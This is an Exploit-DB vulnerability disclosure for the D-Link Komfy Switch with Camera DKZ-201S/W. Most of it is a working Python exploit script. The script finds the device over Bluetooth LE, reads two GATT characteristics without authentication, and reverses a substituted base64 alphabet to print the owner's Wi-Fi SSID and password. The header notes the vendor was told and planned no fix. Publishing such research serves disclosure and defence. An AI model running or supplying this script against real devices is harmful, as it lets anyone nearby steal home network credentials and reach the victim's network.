Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure

EDB-ID:

40633

CVE:

N/A




Platform:

Hardware

Date:

2016-10-26


#!/usr/bin/python
# Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE
# Date: Oct 13, 2016
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/
# HW Model: DKZ-201S/W
# SW Version: 1.0
# Tested on: Ubuntu 16.04 LTS / Python 2.7
# Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link
#                      10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned.

# Vulnerability Summary
#It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's associated wifi ssid and password over bluetooth (4.0/BLE).

# Vulnerability Details
#https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure  



# Author: Jason Doyle @_jasondoyle
# Komfy Switch with Camera wifi password disclosure exploit script
import re, base64
from bluepy.btle import Scanner
from gattlib import GATTRequester

#lookup table to unscramble
base64Alphabet =  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" # '=' used for padding
komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$" # '$' used for padding

scanner = Scanner()

devices = scanner.scan(5.0)
bAddr = ""
for dev in devices:
    if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9):
        bAddr = dev.addr
        print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi)
if not bAddr:
    print "No Komfy switches found"
    sys.exit(1)

req = GATTRequester(bAddr.encode('ascii','ignore'), False, 'hci0')
req.connect(True, 'public', 'none', 0, 78)

#request SSID
wifiSsid = req.read_by_uuid("0xb006")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiSsid)
wifiSsid = reg.groups()[1].replace("\\","")

#request komfy encoded wifi password
wifiPassKomfy64 = req.read_by_uuid("0xb007")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64)
wifiPassKomfy64 = reg.groups()[1].replace("\\","")

#convert password to real base64
wifiPassBase64 = ""
for char in wifiPassKomfy64:
    i = komfy64Alphabet.index(char)
    wifiPassBase64 += base64Alphabet[i]

wifiPass = base64.b64decode(wifiPassBase64)
print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass)